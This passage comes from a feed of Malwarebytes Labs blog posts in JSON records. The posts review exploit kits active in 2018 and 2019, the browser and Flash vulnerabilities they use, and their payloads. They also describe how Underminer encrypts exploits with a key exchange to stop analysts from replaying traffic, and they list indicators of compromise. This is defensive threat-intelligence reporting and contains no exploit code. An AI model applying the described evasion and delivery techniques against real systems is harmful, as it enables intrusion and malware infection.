Diffie-Hellman key exchange to prevent offline replays by security analysts.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2019/11/FalloutEK.png)](<https://blog.malwarebytes.com/wp-content/uploads/2019/11/FalloutEK.png> \"\" )\n\n**Payloads seen**: Sodinokibi, AZORult, Kpot, Raccoon, Danabot\n\n### Magnitude EK\n\nMagnitude EK hasn't changed much in the past few months. The same Magnigate infrastructure is being used to redirect users to fake cryptocurrency domains. The payload remains Magniber ransomware delivered in fileless mode.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2019/11/MagnitudeEK_.png)](<https://blog.malwarebytes.com/wp-content/uploads/2019/11/MagnitudeEK_.png> \"\" )\n\n**Payload seen**: Magniber\n\n### RIG EK\n\nRecently, RIG EK seems to have dropped its Flash Player exploit and instead relies solely on Internet Explorer. One active campaign is HookAds, which uses a fake gaming website to redirect to the exploit kit.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2019/11/RIGEK.png)](<https://blog.malwarebytes.com/wp-content/uploads/2019/11/RIGEK.png> \"\" )\n\n**Payloads seen**: Smoke Loader, Sodinokibi, Paradise, Antefrigus\n\n### GrandSoft EK\n\nGrandSoft EK is not as commonly observed this fall, and appears to have limited payload distribution. It is known to focus on the distribution of the Ramnit Trojan.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2019/11/GrandSoftEK.png)](<https://blog.malwarebytes.com/wp-content/uploads/2019/11/GrandSoftEK.png> \"\" )\n\n**Payload seen**: Ramnit\n\n### Underminer EK\n\nUnderminer EK is one of the more interesting exploit kits on the market, due to its unusual way of delivering its [Hidden Bee payload](<https://blog.malwarebytes.com/threat-analysis/2018/07/hidden-bee-miner-delivered-via-improved-drive-by-download-toolkit/>). Not only is it fileless, but it is packed in a particular way that hints that the exploit kit and malware developer are one and the same.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2019/11/UnderminerEK.png)](<https://blog.malwarebytes.com/wp-content/uploads/2019/11/UnderminerEK.png> \"\" )\n\n**Payload seen**: Hidden Bee\n\n### KaiXin EK\n\nKaiXin EK is a more obscure exploit kit we seldom run into, perhaps because it seems to target the Asian market. However, it appears to still be around on the same infrastructure.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2019/11/KaiXinEK.png)](<https://blog.malwarebytes.com/wp-content/uploads/2019/11/KaiXinEK.png> \"\" )\n\n**Payload seen**: Dupzom\n\n### Purple Fox EK\n\nPurple Fox was [described](<https://blog.trendmicro.com/trendlabs-security-intelligence/purple-fox-fileless-malware-with-rookit-component-delivered-by-rig-exploit-kit-now-abuses-powershell/>) previously by TrendMicro and is an interesting drive-by framework that loads fileless malware. While it was once loaded via RIG EK, it is now seen on its own. For this reason, we believe it can be called an exploit kit as well.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2019/11/PurpleFoxEK_.png)](<https://blog.malwarebytes.com/wp-content/uploads/2019/11/PurpleFoxEK_.png> \"\" )\n\n**Payload seen**: Kpot\n\n### Capesand EK\n\nCapesand EK is the latest exploit to have [surfaced](<https://blog.trendmicro.com/trendlabs-security-intelligence/new-exploit-kit-capesand-reuses-old-and-new-public-exploits-and-tools-blockchain-ruse/>) although it is based on code from an old EK called Demon Hunter. It was spotted on a particular malvertising campaign, perhaps suggesting the work of one malware author for his own distribution.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2019/11/CapesandEK_.png)](<https://blog.malwarebytes.com/wp-content/uploads/2019/11/CapesandEK_.png> \"\" )\n\n**Payload seen**: NjRAT\n\n### Maintaining a foothold\n\nIt's interesting to see exploit kits alive and kicking, despite relying on aging vulnerabilities and a decrease in user base of both Internet Explorer and the Flash Player.\n\nIn the past quarter, we've observed sustained malvertising activity and a diversity of malware payloads served. We can probably expect this trend to continue and perhaps even see new frameworks pop up. Even if it remains remote, we can't discard the possibility of an exploit kit targeting one of the newer browsers.\n\nConsumer and enterprise users still running Internet Explorer are protected from these exploit kits with [Malwarebytes](<http://www.malwarebytes.com/pricing>).\n\nThe post [Exploit kits: fall 2019 review](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2019/11/exploit-kits-fall-2019-review/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-11-19T18:08:20", "type": "malwarebytes", "title": "Exploit kits: fall 2019 review", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15982", "CVE-2018-4878", "CVE-2018-8174"], "modified": "2019-11-19T18:08:20", "id": "MALWAREBYTES:21860B5266FF4C6017A8B388973F2911", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2019/11/exploit-kits-fall-2019-review/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T16:33:47", "description": "Exploit kit activity remains fairly unchanged since our last [winter review](<https://blog.malwarebytes.com/threat-analysis/2019/02/exploit-kits-winter-2019-review/>) in terms of active distribution campaigns. But this spring edition will feature a new exploit kit and another atypical EK, in that it specifically goes after routers.\n\nThe main driver behind these drive-by download attacks are various malvertising chains with strong geolocation filtering. This explains why some exploit kits will be less visible than others.\n\nAccording to our telemetry, the US is by far the country most affected by exploit kits, while Spain and South Korea are leading in Europe and Asia, respectively.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2019/05/pie_chart.png)](<https://blog.malwarebytes.com/wp-content/uploads/2019/05/pie_chart.png> \"\" )\n\n### Spring 2019 overview\n\n * Spelevo EK\n * Fallout EK\n * Magnitude EK\n * RIG EK\n * Underminer EK\n * Router EK\n\n### Vulnerabilties\n\nInternet Explorer's [CVE-2018-8174](<https://blog.malwarebytes.com/threat-analysis/2018/05/internet-explorer-zero-day-browser-attack/>) and Flash Player\u2019s [CVE-2018-15982](<https://blog.malwarebytes.com/malwarebytes-news/2018/12/new-flash-player-zero-day-used-russian-facility/>) are the most common vulnerabilities, while the older[ CVE-2018-4878](<https://blog.malwarebytes.com/cybercrime/2018/02/new-flash-player-zero-day-comes-inside-office-document/>) (Flash) is still used by some EKs.\n\n### Spelevo EK\n\nSpelevo EK is a new exploit kit that was [identified](<https://twitter.com/kafeine/status/1103649040800145409>) in March 2019 and features the most recent Flash exploit (CVE-2018-15982). Based on our internal tests, Spelevo's Flash exploit will check for and avoid virtual machines before delivering its payload.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2019/05/Spelevo_EK.png)](<https://blog.malwarebytes.com/wp-content/uploads/2019/05/Spelevo_EK.png> \"\" )\n\nPayloads seen: PsiX Bot, IcedID \n\n### Fallout EK\n\nFallout EK is one of the more active exploit kits with some of the more intricate URI patterns. For a while, Fallout was loading its IE exploit [via a GitHub PoC](<https://twitter.com/nao_sec/status/1100931219242442752>), but it eventually switched back to [self-hosting](<https://twitter.com/EKFiddle/status/1116134534989238272>).\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2019/05/FalloutEK.png)](<https://blog.malwarebytes.com/wp-content/uploads/2019/05/FalloutEK.png> \"\" )\n\nPayloads seen: GandCrab, Raccoon Stealer, [Baldr](<https://blog.malwarebytes.com/threat-analysis/2019/04/say-hello-baldr-new-stealer-market/>)\n\n### Magnitude EK\n\nNot a lot has changed for Magnitude EK during the past few months, as it continues to target a few Asia Pacific (APAC) countries, and exclusively drops its own Magniber ransomware.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2019/05/Magnitude_EK.png)](<https://blog.malwarebytes.com/wp-content/uploads/2019/05/Magnitude_EK.png> \"\" )\n\nPayload seen: [Magniber ransomware](<https://blog.malwarebytes.com/threat-analysis/2017/10/magniber-ransomware-exclusively-for-south-koreans/>)\n\n### RIG EK\n\nRIG EK is also one of the popular exploit kits enjoying a wide distribution via malvertising campaigns, such as Fobos. RIG still uses Flash's CVE-2018-4878, which comes with its own artifacts.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2019/05/RIGEK.png)](<https://blog.malwarebytes.com/wp-content/uploads/2019/05/RIGEK.png> \"\" )\n\nPayloads seen: AZORult, Pitou, [ElectrumDoSMiner](<https://blog.malwarebytes.com/cybercrime/2019/04/electrum-ddos-botnet-reaches-152000-infected-hosts/>)\n\n### Underminer EK\n\nUnderminer EK is distinct from its counterparts for its overkill obfuscation of Internet Explorer and Flash exploits, but more importantly for its unorthodox [Hidden Bee](<https://blog.malwarebytes.com/threat-analysis/2018/07/hidden-bee-miner-delivered-via-improved-drive-by-download-toolkit/>) payload.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2019/05/Underminer_EK.png)](<https://blog.malwarebytes.com/wp-content/uploads/2019/05/Underminer_EK.png> \"\" )\n\nPayload seen: [Hidden Bee](<https://blog.malwarebytes.com/threat-analysis/2018/07/hidden-bee-miner-delivered-via-improved-drive-by-download-toolkit/>)\n\n### Router EK\n\nRouter exploit kits are not new (see [DNSChanger EK](<https://www.proofpoint.com/us/threat-insight/post/home-routers-under-attack-malvertising-windows-android-devices>)), but they are quite dangerous, as they are part of drive-by attacks that alter your router's DNS settings via cross-site request forgery (CSRF). The particular [one](<https://twitter.com/david_jursa/status/1119573958095974400>) we show here ([Novidade](<https://blog.trendmicro.com/trendlabs-security-intelligence/new-exploit-kit-novidade-found-targeting-home-and-soho-routers/>)) targets Brazilian users. The end goal is typically to redirect users to phishing websites with victims being none the wiser.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2019/05/RouterEK.png)](<https://blog.malwarebytes.com/wp-content/uploads/2019/05/RouterEK.png> \"\" )\n\nPayload seen: DNS changer\n\n### Mitigation\n\nMalwarebytes users are protected against these exploits kits, thanks to our anti-exploit and web protection technologies. The animation below features Malwarebytes Endpoint Protection and Response, one of our [business products](<https://www.malwarebytes.com/business/>), and shows how it blocks each of these attacks.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2019/05/ek_spring_2019.gif)](<https://blog.malwarebytes.com/wp-content/uploads/2019/05/ek_spring_2019.gif> \"\" )\n\nThe post [Exploit kits: spring 2019 review](<https://blog.malwarebytes.com/threat-analysis/2019/05/exploit-kits-spring-2019-review/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-05-14T15:57:05", "type": "malwarebytes", "title": "Exploit kits: spring 2019 review", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15982", "CVE-2018-4878", "CVE-2018-8174"], "modified": "2019-05-14T15:57:05", "id": "MALWAREBYTES:DA40246EC094218998CD2BD24735C7A6", "href": "https://blog.malwarebytes.com/threat-analysis/2019/05/exploit-kits-spring-2019-review/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-02-12T17:22:49", "description": "Active malvertising campaigns in December and the new year have kept exploit kit activity from hibernating in winter 2019. We mostly observed Fallout and RIG with the occasional, limited GrandSoft appearance for wider geo-targeting.\n\nIn addition, narrowly-focused exploit kits such as Magnitude, Underminer, and GreenFlash Sundown stayed on the same track: delivering ransomware to mostly Asian countries, and South Korea in particular.\n\n### Winter 2019 overview\n\n * Fallout EK\n * RIG EK\n * GrandSoft EK\n * Magnitude EK\n * Underminer EK\n * GreenFlash Sundown EK\n\nInternet Explorer\u2019s [CVE-2018-8174](<https://blog.malwarebytes.com/threat-analysis/2018/05/internet-explorer-zero-day-browser-attack/>) and Flash\u2019s [CVE-2018-4878](<https://blog.malwarebytes.com/cybercrime/2018/02/new-flash-player-zero-day-comes-inside-office-document/>) continue to be the most common vulnerabilities across the board, even though a couple exploit kits have now integrated the newer Flash [CVE-2018-15982](<https://blog.malwarebytes.com/malwarebytes-news/2018/12/new-flash-player-zero-day-used-russian-facility/>).\n\n### Fallout EK\n\nFallout keeps bringing fresh air into an otherwise stale atmosphere by introducing new [features](<https://blog.malwarebytes.com/threat-analysis/2019/01/improved-fallout-ek-comes-back-after-short-hiatus/>) and even adopting newer vulnerabilities. It also appears to be a good experimental framework for some actors who have customized the payload delivery. Fallout was the second exploit kit to add [CVE-2018-15982](<https://malware.dontneedcoffee.com/2019/01/CVE-2018-15982.html>), a more recent vulnerability for the Flash Player.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2019/02/Fallout_EK_.png)](<https://blog.malwarebytes.com/wp-content/uploads/2019/02/Fallout_EK_.png> \"\" )\n\n### RIG EK\n\nGood old RIG is still kicking around, but has taken a back seat to the newer Fallout in many of the malvertising chains we track, except perhaps for [Fobos](<https://malwarebreakdown.com/2017/08/16/fobos-campaign-using-rig-ek-to-drop-bunitu-trojan/>). There haven't been any notable changes to report since we last reviewed it.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2019/02/RIG_EK_.png)](<https://blog.malwarebytes.com/wp-content/uploads/2019/02/RIG_EK_.png> \"\" )\n\n### GrandSoft EK\n\nGrandSoft and its Ramnit payload still go hand-in-hand via limited distribution tied to compromised websites. It is perhaps one of the least sophisticated exploit kits on the market right now.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2019/02/GrandSoft_EK.png)](<https://blog.malwarebytes.com/wp-content/uploads/2019/02/GrandSoft_EK.png> \"\" )\n\n### Magnitude EK\n\nMeanwhile, Magnitude EK is active and served up via malvertising chains, with a focus on some APAC countries like South Korea. Magnitude continues to deliver its fileless Magniber ransomware payload.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2019/02/Magnitude_EK_.png)](<https://blog.malwarebytes.com/wp-content/uploads/2019/02/Magnitude_EK_.png> \"\" )\n\n### Underminer EK\n\nUnderminer's over-the-top encryption schemes to hide its exploits are keeping us researchers honest when trying to identify exactly what is under the hood. It's worth noting that only a few days after the Flash zero-day and Proof of Concept (PoC) had been published ([CVE-2018-15982](<https://blog.malwarebytes.com/malwarebytes-news/2018/12/new-flash-player-zero-day-used-russian-facility/>)), Underminer was already [implementing](<https://blog.malwarebytes.com/threat-analysis/2018/12/underminer-exploit-kit-improves-latest-iteration/>) it.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2019/02/Underminer_EK.png)](<https://blog.malwarebytes.com/wp-content/uploads/2019/02/Underminer_EK.png> \"\" )\n\n### GreenFlash Sundown EK\n\nAlso a geo-specific exploit kit, GreenFlash Sundown has been delivering various breeds of ransomware to targets in Asia. In our latest capture, we saw it drop the Seon ransomware on South Korean users.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2019/02/GreenFlash_Sundown.png)](<https://blog.malwarebytes.com/wp-content/uploads/2019/02/GreenFlash_Sundown.png> \"\" )\n\n### Mitigation\n\nWhile timely patching and avoidance of Internet Explorer as a web browser would offer protection against the above-mentioned exploit kits, the reality is that many users (especially in corporate environments) are still trailing behind. In addition, while IE is being phased out in North America, it's still highly adopted in Asian countries\u2014which explains why they are currently being targeted.\n\n[Malwarebytes' anti-exploit technology](<http://www.malwarebytes.com>) blocks each of these exploit kits\u2014Fallout, RIG, GrandSoft, Magnitude, Underminer, and GreenFlash Sundown\u2014before they even have a chance to drop their payload.\n\n![](https://blog.malwarebytes.com/wp-content/uploads/2019/02/replay_winter.gif)\n\nAs we move further into 2019, we can say that exploit kits, while nowhere near their peak activity in 2017, are still hanging on, being used primarily in malvertising distribution campaigns. In terms of global activity, Fallout is leading the charge, providing the most diverse campaigns and payloads. Meanwhile, the Asia-specific EKs are for the most part continuing on with their usual pattern of driving innovation (to a degree) and distributing ransomware.\n\nThe post [Exploit kits: winter 2019 review](<https://blog.malwarebytes.com/threat-analysis/2019/02/exploit-kits-winter-2019-review/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-02-12T16:00:00", "type": "malwarebytes", "title": "Exploit kits: winter 2019 review", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15982", "CVE-2018-4878", "CVE-2018-8174"], "modified": "2019-02-12T16:00:00", "id": "MALWAREBYTES:B3C57DCB817E8FCEC5860BC0C22D5A2A", "href": "https://blog.malwarebytes.com/threat-analysis/2019/02/exploit-kits-winter-2019-review/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-12-21T22:12:46", "description": "One of the most interesting exploit kits we track is also a bit of an elusive one, and as such does not receive the same scrutiny as its RIG and Fallout counterparts. Underminer was mentioned in our [Fall 2018 round up](<https://blog.malwarebytes.com/threat-analysis/2018/10/exploit-kits-fall-2018-review/>), and at the time was using [CVE-2018-8174](<https://blog.malwarebytes.com/threat-analysis/2018/05/internet-explorer-zero-day-browser-attack/>) (Internet Explorer) and [CVE-2018-4878](<https://blog.malwarebytes.com/cybercrime/2018/02/new-flash-player-zero-day-comes-inside-office-document/>) (Flash Player up to version 28.0.0.137).\n\nIn mid-December, we noticed some changes with Underminer that prompted us to take a deeper look. This happened around the same time frame as new zero-days and proof of concepts were available, which is typically an opportune moment for exploit kit authors to integrate.\n\n### Previous version and artifacts\n\nThe CVE-2018-4878 vulnerability is somewhat easy to spot within network traffic because it leaves some artifacts behind. Indeed, we use these in our lab and correlate them with other IOCs.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/12/artifacts_nov_.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/12/artifacts_nov_.png> \"\" )\n\nTraffic view of Underminer EK in November, showing CVE-20184878 artifacts\n\nAs documented in our previous [blog post](<https://blog.malwarebytes.com/threat-analysis/2018/07/hidden-bee-miner-delivered-via-improved-drive-by-download-toolkit/>), Underminer uses client-server key exchange when it delivers its IE exploit, which encrypts the code but also prevents analysts from replaying it from a saved network capture. However, its SWF exploit up until now was deployed without such protections in place and could therefore be re-analyzed on its own.\n\n### New covert Flash exploit\n\nThe exploit appears to have changed as of mid-December. First, we did not see the Flash artifacts as we did before, which prompted us to test this exploit with a more recent version of Flash instead (31.0.0.153).\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/12/Underminer_flow.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/12/Underminer_flow.png> \"\" )\n\nTraffic view of the latest Underminer EK using a different Flash exploit implementation\n\nSecond, we saw a new snippet of code within the SWF exploit landing page referencing a _getSalt()_ function. This stoked our curiosity, and as we compared various traffic captures, we noticed that the function would always return different values.\n\nLooking at the SWF exploit itself, we saw code that interacts with the launcher page's JavaScript (_ExternalInterface.call_) and grabs that value in order to pass it to another function that decodes the exploit. When we attempted to replay the malicious SWF \"artificially,\" it would not fire properly.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/12/MBAE.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/12/MBAE.png> \"\" )\n\nMalwarebytes Anti-Exploit triggering with Flash Player 31.0.0.153\n\nBecause the version of Flash we used was 31.0.0.135 (the latest Flash Player was not affected in our tests), we believe Underminer implemented the recent [CVE-2018-15982](<https://blog.malwarebytes.com/malwarebytes-news/2018/12/new-flash-player-zero-day-used-russian-facility/>).\n\nThe way the final payload is packaged and executed remains unique to Underminer. It's what we call [Hidden Bee](<https://blog.malwarebytes.com/threat-analysis/2018/08/reversing-malware-in-a-custom-format-hidden-bee-elements/>). Hidden Bee is a custom payload that has specific modules and lacks the structure of the typical PE format. For this reason, it is more difficult to analyze and gives the attackers more flexibility than if they were using simple shellcode instead.\n\nMalwarebytes users are already protected against this exploit kit, as we block both the Internet Explorer and Flash Player exploits.\n\n### Indicators of compromise (IOCs)\n\nUnderminer IP:\n \n \n 98.126.222[.]187\n\nFlash exploit\n \n \n d75710ebc8516e73e3a8dd7d1ad1ebc3221b7a141659c7e84b9f5f97dd7ec09e\n\nCustom payload\n \n \n 5574f4b0b507130db06072930016ed5d2ef79aaa1262faddfdb88891c1599672\n\nThe post [Underminer exploit kit improves in its latest iteration](<https://blog.malwarebytes.com/threat-analysis/2018/12/underminer-exploit-kit-improves-latest-iteration/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-12-21T21:34:24", "type": "malwarebytes", "title": "Underminer exploit kit improves in its latest iteration", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15982", "CVE-2018-4878", "CVE-2018-8174"], "modified": "2018-12-21T21:34:24", "id": "MALWAREBYTES:CCB1B1B23474798BB372D709A6E97F86", "href": "https://blog.malwarebytes.com/threat-analysis/2018/12/underminer-exploit-kit-improves-latest-iteration/", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-07-30T10:57:02", "description": "_This blog post was authored by [@hasherezade](<https://twitter.com/hasherezade>) and [J\u00e9r\u00f4me Segura](<https://blog.malwarebytes.com/author/jeromesegura/>)._\n\nWe recently detected a drive-by download attack trying to exploit [CVE-2018-4878](<https://blog.malwarebytes.com/cybercrime/2018/02/new-flash-player-zero-day-comes-inside-office-document/>), a vulnerability in Flash Player, in a sequence that was not matching any of the exploit kit patterns that we currently track. Upon investigation, we discovered something that was new to us, but is part of an [existing exploitation framework](<http://bobao.360.cn/interref/detail/248.html>) referenced in late 2017 by Chinese security firm Qihoo360. At the time, the payload appeared to be a Trojan pushing adware. (_Note: On July 26, our colleagues from TrendMicro published a [blog post](<https://blog.trendmicro.com/trendlabs-security-intelligence/new-underminer-exploit-kit-delivers-bootkit-and-cryptocurrency-mining-malware-with-encrypted-tcp-tunnel/>) calling it the Underminer exploit kit_).\n\nSince it was last documented, there have been changes to the exploits being used, although the distribution method is similar. One interesting aspect that we don't see much of these days is the use of encryption to package exploits on-the-fly, which requires a key from the backend server to decrypt and execute them.\n\nThe payload served in this campaign is also out of the ordinary because it is not a standard PE file. Instead, it is a multiple-stage custom executable format, acting also as a downloader to retrieve LUA scripts used by the threat actors behind the [Hidden Bee](<http://www.cnhongke.org/article/46057>) miner botnet. This was perhaps the first case of a bootkit being used to enslave machines mining cryptocurrencies.\n\n### Campaign overview\n\nThe attackers are leveraging malvertising via adult sites to redirect their victims to the exploit kit landing page. We believe this campaign is primarily targeting Asian countries based on the ads that are served and our own telemetry data. A server purporting to be an online dating service contains a malicious iframe responsible for the exploitation and infection phases.\n\n![](https://blog.malwarebytes.com/wp-content/uploads/2018/07/iframe.png)\n\n### Traffic play-by-play\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/07/traffic_sequence.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/07/traffic_sequence.png> \"\" )\n\n#### IE exploit\n\nWith a few exceptions, exploit kits typically obfuscate their landing page and exploits. But here the threat actors go beyond by using encryption and requiring a key exchange with the backend server in order to decrypt and execute the exploit. In the past, [Angler](<https://securelist.com/attacking-diffie-hellman-protocol-implementation-in-the-angler-exploit-kit/72097/>), [Nuclear](<https://blog.trendmicro.com/trendlabs-security-intelligence/how-exploit-kit-operators-are-misusing-diffie-hellman-key-exchange/>) and [Astrum](<https://blog.trendmicro.com/trendlabs-security-intelligence/astrum-exploit-kit-abuses-diffie-hellman-key-exchange/>) exploit kits have abused the [Diffie-Hellman](<https://en.wikipedia.org/wiki/Diffie%E2%80%93Hellman_key_exchange>) key exchange protocol in similar ways to prevents analysts from replaying malicious traffic.\n\nThe execution of the malicious code starts from a webpage with an embedded encrypted block. This block is Base64 encoded and encrypted with one of two algorithms: [RC4](<https://en.wikipedia.org/wiki/RC4>) or [Rabbit](<https://en.wikipedia.org/wiki/Rabbit_\$cipher\$>).\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/07/base64_rabbit.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/07/base64_rabbit.png> \"\" )\n\nAfter being decrypted, the block is executed. You can find the decoded version of the Java Script that is being run [here](<https://pastebin.com/h7J8geXF>). As you can see in the script, it generates a random session key, then encrypts it with the attacker's public RSA key:\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/07/key.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/07/key.png> \"\" )\n\nThe encrypted key is being passed onto the next function and converted into JSON format to perform a POST request to the hardcoded URL:\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/07/POST.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/07/POST.png> \"\" )\n\nThis is what we can see if we look at the traffic between the client and the server (the client sends the encrypted \"key\" and the server responds with the \"value\"):\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/07/key_value.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/07/key_value.png> \"\" )\n\n**Server-side**\n\n * With the attackers' private RSA key, the server decrypts the passed session key.\n * It uses it to encrypt the exploit content with a chosen symmetric algorithm (Rabbit or RC4).\n * It returns the encrypted content back to the client.\n\nThanks to the fact that the client still has an unencrypted version of the key in memory, it is able to decrypt and execute the exploit. However, researchers who just have the traffic captured cannot retrieve the original session key, and replaying the exploit is impossible. Thankfully, we managed to capture the exploit during dynamic analysis.\n\nWe believe that the decrypted exploit is [CVE-2018-8174,](<https://blog.malwarebytes.com/threat-analysis/2018/05/internet-explorer-zero-day-browser-attack/>) as one of our test machines patched against CVE-2016-0189 got exploited successfully.\n\n#### Flash exploit\n\nThis newer Flash exploit ([CVE-2018-4878](<https://blog.malwarebytes.com/cybercrime/2018/02/new-flash-player-zero-day-comes-inside-office-document/>)) was not part of the exploit toolkit at the time Qihoo documented it, and seems to be a more recent addition to boost its capabilities. The shellcode embedded in the exploit is a downloader for the next stage.\n\nUpon successful exploitation, it will retrieve its payload at the following URL:\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/07/SWF_exploit_.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/07/SWF_exploit_.png> \"\" )This file, given the extension .wasm, pretends to be a Web Assembler module. But in fact, it is something entirely different, appearing to be a custom executable format, or a modified, header-less PE file.\n\nIt starts from the names of the DLLs that are going to be needed during the 